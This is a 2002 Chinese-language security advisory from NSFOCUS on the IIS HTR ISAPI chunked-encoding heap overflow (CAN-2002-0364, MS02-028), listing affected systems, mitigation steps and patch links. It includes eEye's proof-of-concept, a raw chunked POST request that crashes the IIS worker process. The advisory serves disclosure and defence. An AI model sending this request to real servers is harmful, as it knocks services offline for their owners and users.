首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第32期->最新漏洞
期刊号: 类型: 关键词:
Microsoft IIS HTR ISAPI扩展chunked传输模式远程堆溢出漏洞

日期:2002-06-19

发布日期: 2002-5-27
更新日期: 2002-6-3
受影响的系统:  
Microsoft IIS 4.0
    - Microsoft Windows NT 4.0
Microsoft IIS 5.0
    - Microsoft Windows 2000 SP2
    - Microsoft Windows 2000 SP1
    - Microsoft Windows 2000

描述:
--------------------------------------------------------------------------------


BUGTRAQ  ID: 4855
CVE(CAN) ID: CAN-2002-0364

IIS是一款Microsoft公司维护的Web服务器程序。

IIS的HTR ISAPI扩展实现上存在漏洞,可导致远程攻击者以Web进程的权限在目标系统上执行任意指令。

IIS的HTR ISAPI扩展在处理以chunked传输方式的HTTP请求时存在堆破坏溢出漏洞,远程攻击者可以利用此漏洞进行拒绝服务攻击或者以Web进程的权限在目标系统上执行任意指令。此漏洞的成因与ASP ISAPI的堆溢出漏洞相似。

<*来源:Next Generation Security Software
  
  链接:http://www.nextgenss.com/vna/ms-iishtr.txt
        http://www.eeye.com/html/Research/Advisories/AD20020612.html
        http://www.microsoft.com/technet/security/bulletin/MS02-028.asp
*>

测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



eEye Digital Security 提供了如下测试方法:

**************Begin Session****************
POST /EEYE.htr HTTP/1.1
Host: 0day.big5.com
Transfer-Encoding: chunked

20
XXXXXXXXXXXXXXXXXXXXXXXXEEYE2002
0
[enter]
[enter]
**************End Session******************

通过以上操作以后,dllhost.dll就会无提示地崩溃。



--------------------------------------------------------------------------------
建议:

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 您应该立刻删除".htr"脚本映射。

   可以参考如下步骤删除上述脚本映射:

   1. 打开Internet 服务管理器                                              
   2. 右击你的服务器(例如 "* nsfocus"),在菜单中选择"属性"栏              
   3. 选择"主属性"                                                          
   4. 选择 WWW 服务 | 编辑 | 主目录 | 配置                                  
   5. 在扩展名列表中删除".htr"项。                                
   6. 保存设置,然后重启IIS服务。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS02-028)以及相应补丁:
MS02-028:Heap Overrun in HTR Chunked Encoding Could Enable Web Server Compromise(Q321599)
链接:http://www.microsoft.com/technet/security/bulletin/MS02-028.asp

补丁下载:
    * Microsoft IIS 4.0:
       http://www.microsoft.com/Downloads/Release.asp?ReleaseID=39579

     * Microsoft IIS 5.0:
       http://www.microsoft.com/Downloads/Release.asp?ReleaseID=39217
版权所有,未经许可,不得转载